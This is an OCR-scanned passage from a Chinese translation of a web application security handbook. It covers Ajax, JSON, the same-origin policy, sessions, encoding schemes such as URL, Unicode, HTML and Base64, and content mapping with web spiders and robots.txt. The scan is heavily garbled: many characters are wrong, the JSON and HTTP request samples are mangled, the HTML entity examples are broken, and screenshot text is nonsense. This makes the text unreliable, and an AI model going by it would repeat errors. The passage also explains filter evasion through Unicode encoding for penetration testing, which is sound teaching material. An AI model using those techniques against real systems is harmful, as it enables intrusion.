最 早 的 Web 应 用 程序 基于 完整 的 页 面 。 每 个 用 户 操作 ， 如 单 击 链 
接 或 提交 表单 ， 都 会 启动 窗口 级 别 的 导航 事件 ， 导 致 服务 锅 加 载 新 页 
面 。 这 种 运行 方式 会 导致 不 连续 的 用 户 体验 ， 在 应 用 程序 收 到 来 自 服 
务 絮 的 庞大 响应 并 重新 显示 整个 页 面 时 ， 会 出 现 长 时 间 的 延 返 。 

使 用 Ajax， 一 些 用 户 操作 将 由 客户 端 脚本 代码 进行 处 理 ， 并 且 不 
需要 重新 加 载 整个 页 面 。 相 反 ， 脚 本 会 “在 后 台 ” 执 行 请 求 ， 并 且 通 党 
会 收 到 较 小 的 啊 应 ， 用 于 动态 更 新 一 部 分 用 户 界 面 。 例 如 ， 在 基于 
Ajax 的 购物 应 用 程序 中 ， 如 果 用 户 单 击 “ 添 加 到 购物 车 ?按钮 ， 应 用 程 
序 将 局 动 一 个 后 台 请 求 ， 在 服务 恬 端 更 狐 用 户 的 购物 车 记录 ， 随 后 ， 
一 个 轻 量 级 响应 会 更 新 用 户 屏 人 莫 上 显示 的 购物 车 中 商品 的 数量 。 浏 唤 
ub 这 样 焉 为 用 户 市 来 更 快速 、 更 满意 的 

ay O 

Ajax 使 用 的 核心 技术 为 XMLHttpRequest。 经 过 一 定 程度 的 标准 整 
合 之 后 ， 这 种 技术 现在 已 转化 为 一 个 本 地 JavaScript 对 象 ， 窜 户 端 脚本 
可 以 通过 该 对 象 提出 “后 人 台 ” 请 求 ， 而 无 须 窗 口 级 别 的 导航 事件 。 尽 管 
其 名 称 仅 包含 请 求 ， 但 XMLHttpRedquest 人 允许 在 请 求 中 发 送 以 及 在 啊 应 
中 接收 任意 数量 的 内 容 。 虽 然 许 多 Ajax 应 用 程序 确实 使 用 XML 对 消息 
数据 进行 格式 化 ， 但 越 来 越 多 的 Ajax 倾 癌 于 使 用 其 他 表示 方法 来 交换 
数据 (下 一 节 提 供 了 一 个 相关 示例 ) 。 

值得 注意 的 是 ， 虽 然 大 多 数 Ajax 应 用 程序 确实 与 服务 需 进 行 异 步 
通信 ， 但 这 并 不 是 必需 的 。 在 某 些 情况 下 ， 如 执行 特殊 操作 时 ， 可 能 
需要 阻止 用 户 与 应 用 程序 进行 交互 。 这 时 ， 由 于 不 需要 重新 加 载 整个 
页 面 ，Ajax 将 提供 更 加 无 颖 的 体验 。 

以 前 ， 使 用 Ajax 已 在 Web 应 用 程序 中 引入 了 一 些 新 的 漏洞。 从 更 
广义 的 角度 看 ， 使 用 Ajax 会 在 服务 絮 端 和 客户 端 3| 入 更 多 洪 在 的 攻击 
目标 ， 因 而 增加 了 典型 应 用 程序 的 受 攻 击 面 。 在 设计 针对 其 他 漏洞 的 
更 加 高 将 的 入 侵 程 序 时 ， 攻 击 者 也 可 以 利用 Ajax 技术 。 有 天 详 细 信 
息 ， 请 参阅 第 12 章 和 第 13 章 。 

9. JSON 


JavaScript 对 象 表示 法 (ISON) 是 一 种 可 用 于 对 任意 数据 进行 序 
列 化 的 简单 数据 交换 格式 。JSON 可 直接 由 JavaScript 解 释 需 处 理 。Ajax 
应 用 程序 经 党 使 用 SON， 以 替换 最 初 用 于 数据 传输 的 XML 格式 。 通 
常 ， 如 采用 户 执行 某 个 操作 ， 客 户 端 JavaScript 将 使 用 XMLHttpRequest 
将 该 操作 传送 到 服务 器 。 服 务 器 则 返回 一 个 包含 JSON 格 式 的 数据 的 轻 
量 级 啊 应 。 然 后 ， 客 户 端 脚本 将 处 理 这 些 数据 ， 并 对 用 户 界 面 进行 相 
应 地 更 新 。 

例如 ， 基 于 Ajax 的 Web 邮 件 应 用 程序 可 能 提供 显示 所 选 联 系 人 的 
详细 资料 的 功能 。 如 果 用 户 单 击 某 位 联系 人 ， 浏 哆 器 将 使 用 
XMLHttpRequest 检 索 所 选 联系 人 的 详细 资料 ， 并 使 用 JSON 返 回 这 些 


"name": “Mike Kemp", 
Ta" s i Yi 71", 
"email": “fkwitt@layerone.com" 


} 
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新 用 户 界 面 的 相关 部 分 。 

此 外 ， 当 前 的 应 用 程序 还 将 JSON 用 于 封装 传统 上 位 于 请 求 参 数 中 
的 数据 。 例 如 ， 如 采用 户 更 新 联系 人 的 详细 资料 ， 则 可 以 使 用 以 下 请 
求 将 新 信息 传送 至 服务 器 : 


fcontacts HTTP/1.0 


oan mmrm bat 
Content-Type: application/x-www-form-urlencoded 


Content-Length: 89 


Contact={"name":"Mike Kemp", *id":"8041148671", "email": "pikey@ 
clappymonkey.com”} 


&submit=update 


10. 同 源 策略 

同 源 策略 是 浏 贤 絮 实施 的 一 种 关键 机 制 ， 主 要 用 于 防止 不 同 来 源 
的 内 容 相 互 干扰 。 基 本 上 ， 从 一 个 网 站 收 到 的 内 容 可 以 读 取 并 修改 从 
该 站 点 收 到 的 其 他 内 容 ， 但 不 得 访问 从 其 他 站 点 收 到 的 内 容 。 

如 果 不 使 用 同 源 策略 ， 那 么 ， 当 不 知情 的 用 户 浏览 到 某 个 恶意 网 
站 时 ， 在 该 网 站 上 运行 的 脚本 代码 将 能 够 访问 这 名 用 户 同 时 访问 的 任 
何其 他 网 站 的 数据 和 功能 。 这 样 ， 该 恶意 站 点 就 可 以 从 用 户 的 网 上 银 


行进 行 转 账 、 阅 读 用 户 的 Web 邮 件 ， 或 在 用 户 网 上 购物 时 拦截 他 的 信 
用 卡 信息 。 为 此 ， 浏 览 器 实施 限制 ， 只 允许 相同 来 源 的 内 容 进行 交 
H o 


实际 上 ， 将 这 一 概念 应 用 于 各 种 Web 功 能 和 技术 会 导致 各 种 复杂 
情况 和 风险 。 关 于 同 源 策 略 ， 需 要 了 解 的 一 些 主 要 特点 如 下 。 

口 位 于 一 个 域 中 的 页 面 可 以 同 男 一 个 域 提 出 任意 数量 的 请 求 ( 例 
Beeps | eee nee meee 
回 的 数据 。 

口 位 于 一 个 域 中 的 页 面 可 以 加 载 来 自 其 他 域 的 脚本 并 在 自己 的 域 
中 执行 这 个 脚本 。 这 是 因为 脚本 被 假定 为 包含 代码 ， 而 非 数据 ， 因 此 
跨 域 访问 并 不 会 泄露 任何 敏感 信息 。 

口 位 于 一 个 域 中 的 页 面 无 法 读 取 或 修改 属于 另 一 个 域 的 cookie 或 
其 他 DOM 数 据 。 

这 些 特点 可 能 导致 各 种 跨 域 攻击 ， 如 诱 使 用 户 执行 操作 和 捕获 数 
据 。 此 外 ， 由 于 浏览 器 扩展 技术 以 各 种 方式 实施 同 源 限制 ， 这 一 问题 
变 得 更 加 复杂 。 我 们 将 在 第 13 章 详细 讨论 这 些 问题 。 

11. HTMLS5 

HTML5 是 对 HITML 标 准 的 重大 更 新 。 当 前 ，HTML5 仍 处 在 开发 阶 
段 ， 仅 在 浏览 器 中 进行 了 小 规模 实施 。 

从 安全 角度 看 ， 我 们 对 HTML5 感 兴趣 主要 出 于 以 下 原因 。 

口 它 引入 了 各 种 可 用 于 传送 跨 站 点 脚本 及 实施 其 他 攻击 的 新 标 
签 、 属 性 和 API (会 在 第 12 章 讲述 ) 。 

口 它 对 XMLHttpRequest 这 一 核心 Ajax 技 术 进 行 了 修改 ， 在 某 些 情 
ee ener 0 eee 
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口 它 引入 了 新 的 客户 端 数据 存 储 机 制 ， 这 可 能 导致 用 户 隐私 问题 
以 及 新 型 攻击 ， 如 客户 端 SQL 注入 (会 在 第 13 章 讲述 ) 。 

12. “Web 2.0” 

近 些 年 来 ，Web 2.0 这 个 专业 术语 已 经 成 为 一 个 流行 词汇 ， 用 于 
Web 应 用 程序 领域 内 的 各 种 相关 趋势 (尽管 并 不 准确 ) 的 描述 ， 这 些 
趋势 包括 : 

口 大 量 使 用 Ajax 执行 各 种 异步 后 台 请 求 ; 

口 使 用 各 种 技术 提高 跨 域 集成 ; 

口 在 客户 端 使 用 各 种 新 技术 ， 包 括 XML、JSON 和 Flex; 

口 采 用 更 先进 的 技术 来 支持 用 户 生 成 的 内 容 、 信 息 共 享 和 交互 。 


和 技术 领域 的 所 有 新 技术 一 样 ， 这 些 趋势 也 造成 了 各 种 安全 漏 
。 但 是 ， 总 体 而 言 ， 这 些 漏洞 并 未 形成 新 的 Web 应 用 程序 安全 问 
© Web 2.0 相 关 的 漏洞 在 很 大 程度 上 与 这 种 趋势 出 现 之 前 的 漏洞 相 
， 或 派生 自 之 前 的 漏洞 。 总 的 来 说 , “Web 2.0 安 全 ”是 一 个 错误 的 概 
， 它 对 于 我 们 考虑 重要 的 问题 并 无 帮助 。 

13. 浏览 器 扩展 技术 

除 JavaScript 功 能 外 ， 一 些 Web 应 用 程序 还 通过 采用 浏览 器 扩展 技 
术 ， 使 用 定制 代码 从 各 方面 扩展 浏览 器 的 内 置 功能 。 这 些 组 件 可 配置 
为 字 节 码 ， 由 适当 的 浏览 器 插件 执行 ， 或 需要 在 客户 计算 机 上 安装 本 
ee AE 0s 
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口 Java applet; 

口 ActiveX 探 件 ; 

口 Flash 对 和 象 ; 

g Silverlight% ° 

我 们 将 在 第 5 章 详细 讨论 这 些 技术 。 


3.2.3 ”状态 与 会 话 


运 今 为 止 ， 本 书 讨论 的 技术 主要 用 于 帮助 Web 应 用 程序 服务 器 和 
客户 端 组 件 以 各 种 方式 进行 数据 交换 和 处 理 。 但 是 ， 为 实现 各 种 有 用 
的 功能 ， 应 用 程序 需要 追踪 每 名 用 户 通 过 不 同 的 请 求 与 应 用 程序 交互 
的 状态 。 例 如 ， 一 个 购物 应 用 程序 允许 用 户 浏 览 产品 目录 、 往 购物 车 
内 添加 商品 、 查 看 并 更 新 购物 车 内 容 、 结 账 并 提供 个 人 与 支付 信息 。 

为 实现 这 种 功能 ， 应 用 程序 必须 维护 一 组 在 提交 各 种 请 求 过 程 中 
由 用 户 操作 生成 的 有 状态 数据 。 这 些 数据 通常 保存 在 一 个 叫做 会 话 的 
服务 器 端 结构 中 。 当 用 户 执 行 一 个 操作 (如 在 购物 车 中 添加 一 件 商 
mm) 时 ， 服 务 器 端 应 用 程序 会 在 用 户 会 话 内 更 新 相关 信息 。 以 后 用 户 
ee 
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在 一 些 应 用 程序 中 ， 状 态 信息 保存 在 客户 端 组 件 而 非 服务 器 中 。 
服务 器 在 响应 中 将 当前 的 数据 传送 给 客户 端 ， 客 户 端 再 在 请 求 中 将 其 
返回 给 服务 妖 。 当 然 ， 由 于 通过 客户 端 组 件 传送 的 任何 数据 都 可 被 用 
户 修 改 ， 因 此 ， 应 用 程序 需要 采取 措施 阻止 攻击 者 更 改 这 些 状 态 信 
息 ， 破 坏 应 用 程序 的 逻辑 。ASPNET 平 台 利 用 隐藏 表单 字段 ViewState 
保存 与 用 户 的 Web 界 面 有 关 的 状态 信息 ， 从 而 减轻 服务 器 的 工作 负 


J 。 默认 情况 下 ，ViewState 的 内 容 中 还 包括 一 个 密 钥 散 列 ， 以 防止 受 
到 破坏 。 

因为 HTTP 协议 本 喘 并 没有 状态 ， 为 使 用 正确 的 状态 数据 处 理 每 个 
请 求 ， 大 多 数 应 用 程序 需要 采用 某 种 方法 在 各 种 请 求 中 重新 确认 每 一 
名 用 户 的 身份 。 通 常 ， 应 用 程序 会 癌 每 名 用 户 发 布 一 个 令 脾 ， 对 用 户 
会 话 进行 唯一 标识 ， 从 而 达到 这 一 目的 。 这 些 令 牌 可 使 用 任何 请 求 参 
数 传输 ， 但 许多 应 用 程序 往往 使 用 HTTP cookie 来 完成 这 项 任务 。 会 话 
处 理 过 程 中 也 会 产生 几 种 漏洞 ， 第 7 章 将 详细 讨论 这 些 内 容 。 


3.3 ”编码 方案 


Web 应 用 程序 对 其 数据 采用 几 种 不 同 的 编码 方案 。 在 早期 阶段 ， 
HTTP 协 议和 HTML 语 言 都 是 基于 文本 的 ， 于 是 人 们 设计 出 不 同 的 编码 
方案 ， 确 保 这 些 机 制 能 够 安全 处 理 不 各 见 的 字符 和 二 进 制 数据 。 攻 击 
Web 应 用 程序 通常 需要 使 用 相关 方案 对 数据 进行 编码 ， 确 保 应 用 程序 
按照 想 要 的 方式 对 其 进行 处 理 。 而 且 ， 在 许多 情况 下 ， 攻 击 者 甚至 能 
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3.3.1 URLS 


URL 只 允许 使 用 US-ASCII 字 符 集 中 的 可 打印 字符 (也 就 是 ASCII 
代码 在 0x20 ~ 0x7e 范 围 内 的 字符 ) 。 而 且 ， 由 于 其 在 URL 方 案 或 HTTP 
协议 内 具有 特殊 含义， 这 个 范围 内 的 一 些 字符 也 不 能 用 在 URL 中 。 

URL 编 码 方案 主要 用 于 对 扩展 ASCII 字 符 集中 的 任何 有 问题 的 字 
符 进 行 编码 ， 使 其 可 通过 HTTP 安 全 传输 。 任 何 URL 编 码 的 字符 都 以 % 
为 前 级 ， 其 后 是 这 个 字符 的 两 位 十 六 进 制 ASCII 代 码 。 以 下 是 一 些 常 
见 的 URL 编 码 字 符 : 

g %3d 代 表 =; 

口 %25 代 表 %; 

口 %20 代 表 空 格 ; 

口 %0a 代 表 新 行 ; 

口 %00 代 表 空 字 广 。 

男 一 个 值得 注意 的 编码 字符 是 加 号 (+) ， 它 代表 URL 编 码 的 空 
KE ( 除 %20 代 表 空 格外 ) 。 


T 注解 当 攻击 Web 应 用 程序 时 ， 如 果 需 要 将 以 下 字符 当做 数 
据 插入 HTTP 请 求 中 ， 渗 透 测试 员 必 须 对 它们 进行 URL 编 码 。 

空格 %?& =:;+# 

(当然 ， 当 修改 请 求 时 ， 往 往 需要 使 用 这 些 字符 的 特殊 含义 ， 
例如 ， 给 查询 字符 捉 添加 另外 一 个 请 求 参数 。 这 时 应 使 用 这 些 字符 


的 字面 量 形 式 。) 


3.3.2 Unicode 编 码 


Unicode 是 一 种 为 文 持 全 世界 所 使 用 的 各 种 编写 系统 而 设计 的 字符 
编码 标准 ， 它 采用 各 种 编码 方案 ， 其 中 一 些 可 用 于 表示 Web 应 用 程序 
中 的 不 常见 字符 。 

16 位 Unicode 编 码 的 工作 原理 与 URL 编 码 类 似 。 为 通过 HTTP 进 行 
传输 ，16 位 Unicode 编 码 的 字符 以 %u 为 前 经， 其 后 是 这 个 字符 的 十 六 
进 制 Unicode 码 点 。 例 如 : 

口 %u2215 代 表 /:; 

口 %u00e9 代 表 é © 

UTF-8 是 一 种 长 度 可 变 的 编码 标准 ， 它 使 用 一 个 或 几 个 字 节 表示 
每 个 字符 。 为 通过 HTTP 进 行 传输 ，UTF-8 编 码 的 多 字 节 字符 以 % 为 前 
缀 ， 其 后 用 十 六 进 制 表 示 每 个 字 世 。 例 如 : 

口 %c29%a9 代 表 @; 

I %e2%89%a0 UF © 

攻击 Web 应 用 程序 时 之 所 以 要 用 到 Unicode 编 码 ， 主 要 在 于 有 时 可 
用 它 来 破坏 输入 确认 机 制 。 如 果 输 入 过 滤 阻 止 了 某 些 恶意 表达 式 ， 但 
随后 处 理 输入 的 组 件 识别 Unicode 编 码 ， 就 可 以 使 用 各 种 标准 与 畸形 
Unicode 编 码 避 开 过 滤 。 


3.3.3_HTML 编码 


HTML 编 码 是 一 种 用 于 表示 问题 字符 以 将 其 安全 并 入 HTML 文 档 
的 方案 。 有 许多 字符 具有 特殊 的 含义 (如 HTML 内 的 元 字符 ， 并 被 
用 于 定义 文档 结构 而 非 其 内 容 。 为 了 安全 使 用 这 些 字符 并 将 其 用 在 文 
档 内 容 中 ， 就 必须 对 其 进行 HTML 编 码 。 

HTML 编 码 定 义 了 大 量 HTML 实 体 来 表示 特殊 的 字面 量 字 符 ， 例 


如 : 
口 " 代 表 ?”:; 
口 ' 代 表 ;，; 
口 & 代表 &; 
口 &g1t ;代表 <; 
口 &gty 代 表 > 8 


此 外 ， 任 何 字 符 都 可 以 使 用 它 的 十 进 制 ASCII 码 进行 HTML 编码， 
0: 


口 "代表 "; 

口 #39; 代 表 ’。 

或 者 使 用 十 六 进 制 的 ASCII 码 (Ux BZ) ， 例 如 : 

口 "代表 ”; 

aE 

当 攻 击 Web 应 用 程序 时 ，HTML 编 码 主要 在 探查 跨 站 点 脚本 漏洞 
时 发 挥 作用 。 如 果 应 用 程序 在 响应 中 返回 未 被 修改 的 用 户 输入 ， 那 么 
它 可 能 易于 受到 攻击 ; 但 是 ， 如 果 它 对 和 危险 字符 进行 HTML 编码 ， 也 
许 比较 安全 。 请 参阅 第 12 章 了 解 有 关 这 些 漏洞 的 更 多 详情 。 


3.3.4 ”Base64 编 码 


Base64 编 码 仅 用 一 个 可 打印 的 ASCII 字 符 就 可 安全 转换 任何 二 进 
制 数据 ， 它 常用 于 对 电子 邮件 附件 进行 编码 ， 使 其 通过 SMTP 安 全 传 
输 。 它 还 可 用 于 在 基本 HTTP 验 证 机 制 中 对 用 户 证 书 进行 编码 。 

Base64 编 码 将 输入 数据 转换 成 3 个 字 节 块 。 每 个 块 被 划分 为 4 段 ， 
每 段 6 个 数据 位 。 这 6 个 数据 位 有 64 种 不 同 的 排列 组 合 ， 因 此 每 个 段 可 
使 用 一 组 64 个 字符 表示 。Base64 编 码 使 用 以 下 字符 集 ， 其 中 只 包含 可 
打印 的 ASCII 字 符 : 


ABCDEFGEIUKLMNOPORSTUVWXYZabcdefghi jklmnopoerstuvwxyz01234567894/ 
如 果 最 后 的 输入 数据 块 不 能 构成 3 段 输出 数据 ， 就 用 一 个 或 两 个 等 号 
(=) 补足 输出 。 
例如 ，The Web Application Hacker’s Hand book 的 Base64 编 码 为 : 


例 妇 


VGhlIFdlYiBBCHBsaWNhdGlvbiBIYWNrZXIncyBIYW5kYm9vaw== 


许多 Web 应 用 程序 利用 Base64 编 码 在 cookie 与 其 他 参数 中 传送 二 进 
制 数据 ， 甚 至 用 它 打 乱 敏感 数据 以 防止 即使 是 细微 的 修改 。 应 该 总 是 
留意 并 解码 发 送 到 客户 端的 任何 Base64 数 据 。 由 于 这 些 数据 使 用 特殊 
的 字符 集 ， 而 且 有 时 会 在 字符 串 末 尾 添加 补足 字符 (=) ， 因 此 可 以 
轻易 辨别 出 Base64 编 码 的 字符 串 。 


3.3.5 ”十 六 进 制 编码 


许多 应 用 程序 在 传送 二 进 制 数据 时 直接 使 用 十 六 进 制 编码 ， 用 
ASCII 字 符 表 示 十 六 进 制 数据 块 。 例 如 ， 对 cookie 中 的 用 户 名 dafj 进 行 
十 六 进 制 编码 ， 会 得 到 以 下 结果 : 

646166 

和 Base64 编 码 的 数据 一 样 ， 十 六 进 制 编码 的 数据 通常 也 很 容易 辨 
认 。 为 了 解 十 六 进 制 编码 的 功能 应 当 对 服务 器 发 送 到 客户 端的 任何 十 
六 进 制 数据 进行 解码 。 


3.3.6 远程 和 序列 化 框架 


近 些 年 出 现 了 各 种 用 于 创建 用 户 界 面 的 框架 ， 这 些 框架 中 的 客户 
端 代码 可 以 远程 访问 服务 器 端 实施 的 编程 API。 利 用 这 些 框架 ， 开 发 
者 可 以 在 一 定 程度 上 名 略 Web 应 用 程序 的 分 布 式 本 质 ， 而 以 与 开发 传 
统 桌面 应 用 程序 类 似 的 方式 编写 代码 。 这 些 框架 通常 提供 客户 端 上 使 
用 的 存根 API 。 它 们 还 能 够 目 动 处 理 以 下 两 个 任务 : 通过 这 些 API 远 程 
调用 相关 服务 器 端 功 能 ， 对 传送 给 上 述 功 能 的 任何 数据 进行 序列 化 。 

这 类 远程 和 序列 化 框架 包括 : 

口 Flex 和 AMEF; 

口 Silverlight 和 WCEF: 

口 Java 序 列 化 对 象 。 

我 们 将 在 第 4 章 和 人 第 5 章 讨论 使 用 这 些 框架 的 技巧 以 及 由 此 引发 的 安全 


问题 。 


3.4 = 


到 现在 为 止 ， 我 们 已 经 介绍 了 Web 应 用 程序 的 当前 安全 (风险 ) 
状况 ， 分 析 了 Web 应 用 程序 的 核心 防御 机 制 ， 并 简要 介绍 了 当今 应 用 
程序 所 采用 的 关键 技术 。 基 于 这 些 基础 知识 ， 现 在 我 们 将 开始 研究 渗 
透 测试 员 如 何 同 Web 应 用 程序 发 动 攻 击 。 

在 实施 任何 攻击 之 前 ， 首 要 任务 是 仔细 分 析 目 标 应 用 程序 的 内 容 
及 功能 ， 了 解 它 的 工作 原理 、 防 御 机 制 及 其 使 用 的 技术 。 我 们 将 在 下 
一 革 详 细 介 绍 这 个 解析 过 程 ， 说 明 如 何 通 过 它 深 入 了 解 应 用 程序 的 受 
攻击 面 。 实 践 证 明 ， 这 个 过 程 对 于 渗透 测试 员 发 现 并 利用 目标 应 用 各 
序 的 安全 漏洞 至 关 重 要 。 


3.5 [A 


欲 知 问题 答案 ， 请 访问 http://mdsec.net/wahh ° 

(1) OPTIONS 方 法 有 什么 作用 ? 

(2) If-Modified-Since 和 If-None-Match 消 息 头 的 作用 是 什么 ? 它 
们 为 何 引 起 攻击 者 的 兴趣 ? 

(3) 当 服 务 器 设置 cookie 时 ，secure 标 签 有 什么 意义 ? 

(4) 常用 状态 码 301 与 302 有 什么 不 同 ? 

(5) 使 用 SSL 时 ， 浏 览 器 如 何 与 Web 代 理 实现 互 操 作 ? 


攻击 应 用 程序 的 第 一 步 是 收集 和 分 析 与 其 有 关 的 一 些 关键 信息 ， 
以 清楚 了 解 攻 击 目 标 。 解 析 过 程 首先 是 枚 举 应 用 程序 的 内 容 与 功能 ， 
从 而 了 解 应 用 程序 的 实际 功能 与 运行 机 制 。 我 们 可 轻松 确定 应 用 程序 
的 大 部 分 功能 ， 但 其 中 一 些 功 能 并 不 明显 ， 需 要 进行 猜测 和 和 凭借 一 定 
的 运气 才能 查 明 。 

列 出 应 用 程序 的 功能 后 ， 接 下 来 的 首要 任务 殉 是 仔细 分 析 应 用 程 
序 运行 机 制 的 每 一 个 方面 、 核 心安 全 机 制 及 其 (在 客户 端 和 服务 器 
E) 使 用 的 技术 。 这 样 就 可 以 确定 应 用 程序 暴露 的 主要 受 攻 击 面 并 因 
此 确定 随后 探查 过 程 的 主要 目标 ， 进 而 发 现 可 供 利用 的 调 洞 。 我 们 在 
本 章 后 面部 分 将 讲 到 ， 通 常 在 分 析 过 程 中 整 可 以 发 现 相 关 漏 洞 。 

随 看 应 用 程序 变 得 越 来 越 复 杂 ， 功 能 越 来 越 强 大 ， 有 效 的 解析 将 
成 为 一 种 重要 技能 。 经 验 丰 富 的 专家 能 够 迅速 对 所 有 功能 区 域 进行 分 
类 ， 参 照 各 种 实例 查找 不 同类 型 的 漏洞 ， 同 时 花费 大 量 时 间 测 试 其 他 
等 定 区 域 ， 以 确定 高 风险 的 问题 。 

本 章 将 描述 应 用 程序 解析 过 程 的 主要 步 驴 、 各 种 可 用 来 提高 效率 
的 技巧 与 罕 /]， 以 及 一 些 帮助 进行 解析 的 工具 。 


4.1 EAA SIRE 


AS, PA RN ay He I RE ZB AoA ASE © Di bt 
应 用 程序 的 基本 方法 是 从 主 初 始 页 面 开 始 ， 然 后 是 每 一 个 链接 和 所 有 
多 阶段 功能 《如 用 户 注册 或 密码 重 设置 ) 。 如 果 应 用 程序 有 一 个 “站 点 
地 图 ”， 可 以 从 它 开始 枚 举 内 容 。 

但 是 ， 为 了 仔细 检查 枚 举 的 内 容 ， 全 面 记录 每 一 项 确定 的 功能 ， 
我 们 有 必要 使 用 一 些 更 加 先进 的 技术 ， 而 不 仅仅 是 简单 浏览 。 


4.1.1 Web 抓 取 


我 们 可 使 用 各 种 工具 自动 抓 取 Web 站 点 的 内 容 。 这 些 工具 首先 请 
求 一 个 Web 页 面 ， 对 其 进行 分 析 ， 查 找 连 授 到 其 他 内 容 的 链接 ， 然 后 
请 求 这 些 内 容 ， 再 继续 进行 这 个 循环 ， 直 到 找 不 到 新 的 内 容 为 止 。 

基于 这 一 基本 功能 ，Web 应 用 程序 爬虫 (spider) 以 同样 的 方式 分 
析 HTML 表 单 ， 并 使 用 各 种 预 移 设 定 值 或 随机 值 将 这 些 表 单 返 回 给 应 
用 程序 ， 以 扩大 搜索 范围 、 浏 览 多 阶段 功能 、 进 行 基于 表单 的 导航 

(如 什么 地 方 使 用 下 拉 列 表 作为 内 容 亲 单 ) 。 一 些 工 具 还 对 客户 端 

JavaScript 进 行 某 种 形式 的 分 析 ， 以 提取 指 癌 其 他 内 容 的 URL。 有 各 种 
免费 工具 可 以 详细 枚 举 应 用 程序 的 内 容 与 功能 ， 它 们 包括 Burp Suite ` 
WebScarab ` Zed Attack Proxy 和 CAT (请 参阅 第 20 章 了 解 详情 ) 。 


YY 提示 许多 Web 服 务 器 的 Web 根 目录 下 有 一 个 名 为 robots.txt 
的 文件 ， 其 中 列 出 了 站 点 不 希望 Web 疏 虫 访问 或 搜索 引擎 列 入 索引 


的 URL。 有 时， 这 个 文件 中 还 包含 敏感 功能 的 参考 信息 ， 渗 透 测试 
员 肯 定 会 对 抓 取 这 些 信息 感 兴趣 。 一 些 攻 击 Web 应 用 程序 的 抓 取 工 
具 会 搜索 robots.txt 文 件 ， 并 根据 其 中 列 出 的 URL 开 始 抓 取 过 程 。 在 
这 种 情况 下 ，robots.txt 文 件 可 能 会 危及 Web 应 用 程序 的 安全 。 


在 本 章 中 ， 我 们 将 以 一 个 虚构 的 应 用 程序 Extreme Internet 
Shopping (EIS) 为 例 ， 说 明和 常见 的 应 用 程序 解析 操作 。 使 用 Burp 


Spider 解析 EIS 的 过 程 如 图 4-1 所 示 。 不 需要 登录 ， 即 可 以 解析 出 /shop 
目录 及 /media 目 杂 中 的 两 件 新 商品 。 还 要 注意 的 是 ， 图 中 显示 的 
robots.txt 文 件 引 用 了 /mdsecportal 和 /site-old 目 录 。 这 两 个 日 录 没 有 链接 
到 应 用 程序 中 的 任何 位 置 ，Wweb 压 虫 仅仅 通过 访问 公开 内 容 中 的 链接 
不 可 能 发 现 这 些 目录 。 

burp suite professional (ec), Xo 


Bump intruder repeater window heip 


| target | pray spider scanner | intruder | repeater sequencer Gecoder | comparar | options alerts 
| 
| sitemap scope 


Filter: hiding CSS. image and general Oinary content, hiding ixx responsos 
7 hiip-veis Ba host nethod URL params stets 
Dy: hip ets GET ”oboits 区 20 看 | 
? Gavh 


D ForgaPassword 


图 4-1 使 用 BurpSpider 解 析 应 用 程序 的 部 分 内 容 


\V 提示 采用 REST 风 格 的 URL 的 应 用 程序 使 用 部 分 URL 文 件 


路 径 来 唯一 标识 应 用 程序 所 使 用 的 数据 和 其 他 资源 (请 参阅 第 3 章 
了 解 详情 ) 。 在 这 些 情况 下 ， 传 统 Web 扑 虫 的 基于 URL 的 应 用 程序 
视图 非常 有 用 。 在 EIS 应 用 程序 中 ，/shop 和 /pub 路 径 采 用 了 REST 风 


格 的 URL， 抓 取 这 些 区 域 即 可 轻松 获取 这 些 路 径 中 的 商品 的 唯一 链 
f° 


尽管 通常 能 够 进行 有 效 的 抓 取 ， 但 这 种 完全 自动 化 的 方法 在 内 容 
枚 举 方面 还 存在 一 些 重要 的 限制 。 

口 这 些 工具 一 般 无 法 正确 处 理 不 常用 的 导航 机 制 《如 使 用 复杂 的 
JavaScript 代 码 动 态 建立 和 处 理 的 菜单 ) ， 因 此 可 能 会 遗漏 应 用 程序 某 
个 方面 的 功能 。 

口 爬 虫 可 能 无 法 抓 取 到 隐藏 在 编译 客户 端 对 象 《如 Flash 和 Java 
applet) 中 的 链接 。 

口 多 阶段 功能 往往 会 严格 地 执行 输入 确认 检查 ， 因 而 可 能 不 会 接 
受 由 目 动工 具 提 交 的 值 。 例 如 ， 用 户 注册 表单 中 可 能 包含 姓名 、 电 子 
邮件 地 址 、 电 话 号 码 和 邮政 编码 字段 。 目 动 应 用 程序 爬虫 通常 会 问 每 
一 个 可 编辑 的 表单 字段 提交 一 个 单独 的 测试 字符 串 ， 而 应 用 程序 将 返 
回 一 条 错误 消 轧 ， 称 其 提交 的 一 个 或 几 个 数据 无 效 。 由 于 扑 虫 并 没有 
能 力 理解 这 种 错误 消息 并 采取 相应 行动 ， 所 以 也 了 吏 无 法 成 功 通 过 注 
册 ， 因 此 无 法 发 现 这 以 后 的 任何 其 他 内 容 或 功能 。 

OD 目 动 化 聆 虫 通常 使 用 UREL 作 为 内 容 标识 符 。 为 避免 进行 连续 不 
确定 的 抓 取 ， 如 果 疏 虫 认识 到 链接 内 容 已 被 请 求 ， 它 们 会 识别 出 来 并 
且 不 会 再 向 其 发 出 请 求 。 但 是 ， 许 多 应 用 程序 使 用 基于 表单 的 导航 机 
制 ， 其 中 相同 的 URL 可 能 返回 截然 不 同 的 内 容 和 功能 。 例 如 ， 一 个 银 
行 应 用 程序 可 能 通过 一 个 指 问 /account.jsp 的 POST 请 求 执 行 每 一 项 用 户 
操作 ， 并 使 用 参数 传达 执行 的 操作 。 如 果 扑 虫 拒绝 向 这 个 URL 提 交 多 
次 请 求 ， 它 就 会 遗漏 应 用 程序 的 大 部 分 功能 。 一 些 应 用 程序 息 虫 试图 
解决 这 一 问题 (例如 ， 可 对 Brup Spider 进行 配置 ， 使 其 根据 参数 名 称 
和 参数 值 对 提交 的 表单 进行 “个 性 化 处理 ) 。 但 是 ， 在 许多 情况 下 ， 
这 种 完全 目 动 化 的 方法 并 非 绝对 有 效 。 本 章 后 面 我 们 会 讨论 解析 这 一 
功能 的 方法 。 

口 与 前 面 的 情形 恰恰 相反 ， 一 些 应 用 程序 在 URL 中 插入 实际 上 并 
不 用 于 确定 资源 或 功能 的 可 变数 据 (例如 ， 包 含 定时 器 或 随机 数 种 子 
的 参数 ) 。 应 用 程序 的 每 个 页 面 中 都 可 能 包含 一 组 似乎 是 爬虫 必须 请 
求 的 新 UREL ， 导 致 它 不 断 进 行 不 确定 的 抓 取 。 


口 如果 应 用 程序 使 用 身份 验证 机 制 ， 应 用 程序 息 虫 要 实现 有 效 抓 
取 ， 必 须 能 够 处 理 这 种 机 制 才 能 访问 它 所 保护 的 功能 。 如 果 为 其 手动 
